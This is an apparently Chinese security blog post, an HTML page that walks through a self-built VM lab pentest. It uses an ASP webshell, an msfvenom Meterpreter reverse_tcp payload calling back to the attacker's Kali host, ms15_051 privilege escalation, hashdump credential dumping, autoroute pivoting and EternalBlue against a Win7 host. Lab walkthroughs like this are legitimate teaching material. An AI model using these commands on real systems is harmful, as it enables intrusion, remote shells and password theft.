<!DOCTYPE HTML>
<html lang="zh-CN">
<head>
    

<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="keywords" content="一次系统的内网渗透测试, pgg,信息安全，小白教程，情感博主">
    <meta name="description" content="#一次系统的渗透测试​            所需工具    ：     虚拟机开：一台kail,一台windows sever 2008 ,一台win7
大致过程 ：首先用2008开一个web服务器，我们本地浏览，并上传木马，然后用木马反">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>一次系统的内网渗透测试 | pgg学长</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/css/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

</head>

<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="container">
            <div class="nav-wrapper">
                <div class="brand-logo">
                    <a href="/" class="waves-effect waves-light">
                        
                        <img src="/medias/logo.png" class="logo-img hide-on-small-only">
                        
                        <span class="logo-span">pgg学长</span>
                    </a>
                </div>
                
            </div>
        </div>

        
        
        
    </nav>
</header>





<div class="bg-cover post-cover" style="background-image: url('/medias/featureimages/15.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        一次系统的内网渗透测试
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1,
    #articleContent h2,
    #articleContent h3,
    #articleContent h4,
    #articleContent h5,
    #articleContent h6 {
        padding-top: 76px;
        margin-top: -76px;
    }

    #articleContent h1 {
        line-height: 3.5rem;
    }

    #articleContent h2 {
        line-height: 3.2rem;
    }

    #articleContent h3 {
        line-height: 2.8rem;
    }

    #articleContent h4 {
        line-height: 2.5rem;
    }

    #articleContent h5 {
        line-height: 2.2rem;
    }

    #articleContent h6 {
        line-height: 1.9rem;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
</style>
<div class="row">
    <div class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            
            <div class="post-info">
                

                <span class="post-date">
                    <i class="fa fa-clock-o fa-fw"></i>2019-05-31
                </span>
            </div>
        </div>
        <hr>
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="一次系统的渗透测试"><a href="#一次系统的渗透测试" class="headerlink" title="#一次系统的渗透测试"></a>#一次系统的渗透测试</h1><p>​            <del>所需工具</del>    ：     <strong>虚拟机开：一台kail,一台windows sever 2008 ,一台win7</strong></p>
<p><em>大致过程</em> ：<strong>首先用2008开一个web服务器，我们本地浏览，并上传木马，然后用木马反弹到kail上，提权并扫描其局域网，利用2008做跳板，入侵win 7</strong></p>
<p><em>细节</em>  :   <strong>kail要用桥接模式；2008需要2个网络适配器，一个桥接，一个NAT；win7 NAT就行了</strong></p>
<p><em>说明</em>  ：<strong>因为在没有服务器的情况下自己搭建渗透环境，所以需要kail和2018桥接，让主机和kail,2008互相可以访问。</strong></p>
<ol>
<li><p><strong>搭建2008服务器</strong></p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/1.png"></p>
</li>
</ol>
<p>   搭建好了之后，我们去浏览器访问一下</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/2.png"></p>
<p>   服务器已经搭建成功了，我们上传一个1.txt  看看能不能访问到</p>
<p>   <img src="http://kan.027cgb.com/613977/一次系统的渗透测试/3.png"></p>
<p>   <img src="http://kan.027cgb.com/613977/一次系统的渗透测试/4.png"></p>
<p>   本来是要搭建一个上传页面，但是我们做本地测试就不那么麻烦了，直接上传本地上传一个asp的木马上去</p>
<ol start="2">
<li><p><strong>利用菜刀连接asp的一句话木马</strong></p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/5.png"></p>
<p>使用 命令：WhoamI   查看一下我们是什么权限</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/6.png"></p>
<p>权限好低呀，  本来可以用cve提的，我们现在就用kail提吧</p>
</li>
<li><p><strong>利用菜刀上传kail用msf生成的反弹木马上线到2008上</strong></p>
<p>命令：msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f exe -o liu.exe</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/7.png"></p>
<p>直接用命令：python -m SimpleHTTPServer 8000</p>
<p>开一个ftp,用本机下载，然后通过菜刀上传到2008上面</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/8.png"></p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/9.png"></p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/10.png"></p>
<p>发现上传不到c盘，应该是因为我们权限不够，我们试试上传到其他文件夹</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/11.png"></p>
<p>好了，上传上去了，我们用kail的msf监听，然后再运行这个程序</p>
<p>首先进入监听模块 命令： use exploit/multi/handler </p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/12.png"></p>
<p>然后添加我们生成exe的payload   命令： set payload windows/x64/meterpreter/reverse_tcp</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/13.png"></p>
<p>运行</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/14.png"></p>
<p>虽然运行失败了，但是kail上线了，可能是玄学问题</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/15.png"></p>
<p>现在我们进入到meterpreter 里提权</p>
<p>首先查看一下自身权限</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/16.png"></p>
<p>发现还是一样，权限并没有什么变化</p>
</li>
<li><p><strong>提权</strong></p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/17.png"></p>
<p>普通的令牌窃取提权不行了  现在使用msf提权试试</p>
<p>命令：use post/multi/recon/local_exploit_suggester    </p>
</li>
</ol>
<p>​        漏洞搜索对比</p>
<p>​      <img src="http://kan.027cgb.com/613977/一次系统的渗透测试/18.png"></p>
<p>​    要等好久，，</p>
<p>​    <img src="http://kan.027cgb.com/613977/一次系统的渗透测试/19.png"></p>
<p>​    既然跑出来，那我们就用这些exp跑下试试，看能不能成功提权</p>
<p>​    <img src="http://kan.027cgb.com/613977/一次系统的渗透测试/20.png"></p>
<p>​    发现这些exp都不能打，我们再试试其他的</p>
<p>​    use exploit/windows/local/ms15_051_client_copy_image</p>
<p>​    <img src="http://kan.027cgb.com/613977/一次系统的渗透测试/21.png"></p>
<p>​    <img src="http://kan.027cgb.com/613977/一次系统的渗透测试/22.png"></p>
<p>​    已经打到了会话，查看了权限，是 AUTHORITY\SYSTEM 的权限</p>
<ol start="5">
<li><p>既然拿到了管理员权限，那我们就不能不查看下他的管理员密码了</p>
<p>先用msf里meterprter 里的查看密码模块来查看 命令：meterpreter &gt; run post/windows/gather/smart_hashdump </p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/23.png"></p>
<p>命令：meterpreter &gt; run post/windows/gather/hashdump</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/24.png"></p>
<p>命令：hashdump</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/25.png"></p>
<p>接下来我们就要返回到msf里面查看用户密码 命令：use post/windows/gather/hashdump</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/26.png"></p>
<p>我们的目标是内网里的那台win7 所以就不远程上去了</p>
</li>
</ol>
<ol start="6">
<li><p>内网渗透</p>
<p>先查看跳板机处于哪几个网段中，使用 get_local_subnets 脚本    run get_local_subnets</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/27.png"></p>
<p>直接将内网网段192.168.127.0/24添加至路由表，使用 autoroute 脚本  run autoroute -s 192.168.127.0/24</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/28.png"></p>
<p>添加网路由后，我们来查看下路由的添加情况如何，具体命令如下所示：meterpreter &gt; run autoroute -p</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/29.png"></p>
<p>现在我们来扫一下内网，看我们能不能扫出win7 的内网ip</p>
<p><strong>扫描网段存活主机：</strong> <strong>use post/multi/gather/ping_sweep</strong>     </p>
<p> <strong>use post/windows/gather/arp_scanner</strong></p>
<p><strong>use</strong> auxiliary/scanner/smb/smb_ms17_010</p>
<p><strong>use auxiliary/scanner/smb/smb_version </strong>      等等好多</p>
<p>这里我们就用最后一个</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/30.png"></p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/31.png"></p>
<p>既然扫出来了，那我们就打一下它 用最近最火的永恒之蓝试试</p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/32.png"></p>
<p><img src="http://kan.027cgb.com/613977/一次系统的渗透测试/33.png"></p>
</li>
</ol>
<p><strong>##</strong>   <em>本次内网渗透就这样结束了，爱你们</em></p>

            </div>
            <hr>

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff;
        background-color: #22AB38;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff;
        background-color: #019FE8;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a class="reward-link btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs">
                        <li class="tab wechat-tab waves-effect waves-light"><a class="active" href="#wechat">微信</a></li>
                        <li class="tab alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                    </ul>
                    <div id="wechat">
                        <img src="/medias/reward/ddac.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                    <div id="alipay">
                        <img src="/medias/reward/abcd.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('#reward .reward-link').on('click', function () {
            $('#rewardModal').openModal();
        });

        $('#rewardModal .close').on('click', function () {
            $('#rewardModal').closeModal();
        });
    });
</script>
            

            

            <div class="reprint">
                <p>
                    <span class="reprint-tip">转载请注明: </span>
                    <a href="https://pgg666.org" class="b-link-green">pgg学长</a>
                    <i class="fa fa-angle-right fa-lg fa-fw text-color"></i>
                    <a href="/2019/05/31/一次系统的渗透/" class="b-link-green">一次系统的内网渗透测试</a>
                </p>
            </div>
        </div>
    </div>

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">上一篇</div>
            <div class="card">
                <a href="/2019/06/01/对wordy的入侵检测/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/2.jpg" class="responsive-img" alt="DC系列  对WORDY的一次入侵检测">
                        
                        <span class="card-title">DC系列  对WORDY的一次入侵检测</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">####今天六一##祝各位小哥哥姐姐们开心#DC系列   dc-6dc-6：   http://www.five86.com/dc-6.html
ip:   192.168.0.168
1.  首先先扫描它的端口    nmap –sV –</div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2019-06-01
                        </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            pgg
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">下一篇</div>
            <div class="card">
                <a href="/2019/05/31/mysql数据库/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/45.jpg" class="responsive-img" alt="mysql数据库">
                        
                        <span class="card-title">mysql数据库</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">mysql数据库数据库简介：1. 什么是数据库：数据库就是将大量数据保存起来，通过计算机加工而成的可以高效访问的数据集合数据库是长期储存在计算机内，有组织的，可共享的数据集合。2.常见的数据库：①Oracle Database:甲骨文公司 </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-05-31
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            pgg
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>
    </div>
    <div class="col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title">目录</div>
            <div id="toc-content">

            </div>
        </div>
    </div>
</div>

<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });
    });
</script>
    

</main>




<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title">搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字" class="search-input" autofocus>
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/js/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->


</body>
</html>